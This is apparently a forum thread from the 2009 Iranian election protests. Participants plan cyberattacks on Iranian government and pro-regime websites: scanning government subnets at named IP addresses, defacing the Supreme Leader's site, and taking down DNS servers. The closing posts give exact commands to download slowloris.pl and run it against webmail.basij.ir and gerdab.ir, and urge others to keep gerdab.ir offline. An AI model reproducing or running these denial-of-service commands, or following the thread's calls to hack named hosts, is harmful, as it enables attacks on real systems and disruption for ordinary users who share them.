port 80 and 443 are the webserver. port 21 seems to be filtered. no obvious holes. that webserver can easily be taken down by using slowloris.pl though.
let's get serious Why hack webservers? Come on people, let's scan their subnet range and find more exotic servers housing more exotic features of the government... I'm willing to bet they're on the same subnet... Someone with bandwidth pingsweep and find what hosts are alive and look for vuln services... Ahmadinejad.ir - 217.218.155.110 leader.ir 62.220.121.130 let's find core backbone routers... traceroutes, drop nameservers... if the government doesn't want communication for the people then they shouldn't get communication either...
Here is what I got when I ran a whois query, with the ip 217.218.155.110
Then after querying at that site I got this, not sure if it helps any.
Twitter Account Hacked? This may sound paranoid but.........once I started sending Tweets that said things like, Basiji, you are cowards. You shoot unarmed and women. Lay down your arms. Murder or Freedom. Your choice. I sent Tweets like that for about 4 hours and I never once saw it come up at #iranelection. Before I started saying things like that, I would see my Tweets once in a while. Is it possible Iran gov't. disabled my Twitter account? Or did I just miss it? Thanks.
Stop the ddos attacks You MAY want to pay attention to this post... I can fully see the logic in his/her post and would recommend the same!
don't forget Press TV a fu**ing piece of sh*t News agency n farsnews.com a main website for spreading bullshit
It's good to know what bullshit they are spreading, because it gives you a clue at what they are worried about the most.
To see your tweet you need to include the tag of course. Ex: "Die you scum sucking Basiji#iranelection"
Change content of Supreme Leader's website. Can the content of the Supreme leader's website be modified to include photos of the dead, and videos of the dying next to the photos of the supreme leader.
Redon ballet Maybe you should have paid attention instead. They're already saying that it's all the westerners' fault. DDOS or not. No one gives a shit what they say. They want censorship - they get closed pools.
I always put several tags, #iranelection #Tehran #Iran #Mousavi #gr88 I was seeing my tweets every once in a while before I started posting about Basiji. I posted about them for about 4 hours and realized I was not seeing those Tweets. So I wondered if my account was hacked.
Chinese internet shut down by simple DDoS attack Well, a large portion of it anyway. A DDoS attack on one domain server created a cascade reaction that left five provinces struggling to get online: This is what happened during the DNSPod incident, however, it triggered a chain of unexpected events, which led to network congestions for the carrier networks. DNSPod's servers happen to be used by Baofeng, a highly popular Chinese video streaming service. Once the millions of Baofeng users fired up their desktop application, all the requests bounced off on the ISP servers, which did not know how to process them. The intense traffic on the high-level servers caused bottlenecks, slowing everyone's Internet connection down to a crawl. In addition to the users in the five aforementioned provinces, who were severely affected, customers in Henan, Anhui and Gansu have also reportedly experienced problems. SOURCE: http://www.thedarkvisitor.com/ Site seems to be down??? g
The protesters should try to take control of "Voice Of Justice", assuming the station is in Iran, I've heard it on 9495 AM in North America.
^^^THIS! They have a communications infrastructure which is vital to their operations. If anything were to be accomplished by hacking, it would be an attack against them. Trying to DDOS a pro-regime web site will accomplish nothing.
bwahahaha - funny google bso.ir. their site comes up as "HACKED BY KAMY4r." That may have happened a long time ago - dunno cause the site is inaccessible now.
This seems to be a fake site about Moussavi: www.MirHoseyn.ir http://iran.whyweprotest.net/farsi-english/1689-fake-site.html#post13721 I count on you, HACK IT!
three simple commands... wget http://ha.ckers.org/slowloris/slowloris.pl chmod +x slowloris.pl ./slowloris.pl -dns webmail.basij.ir -port 80 -timeout 1000 -num 500 -tcpto 5 -httpready
posted too soon Scratch that, gerdab.ir is back up - that's the site where the Basij posted up photos of protesters in order to ID and arrest them. Please help bring it back down, we had it down most of the day, the command you should run is: ./slowloris.pl -dns gerdab.ir -port 80 -timeout 1000 -num 500 -tcpto 5 -httpready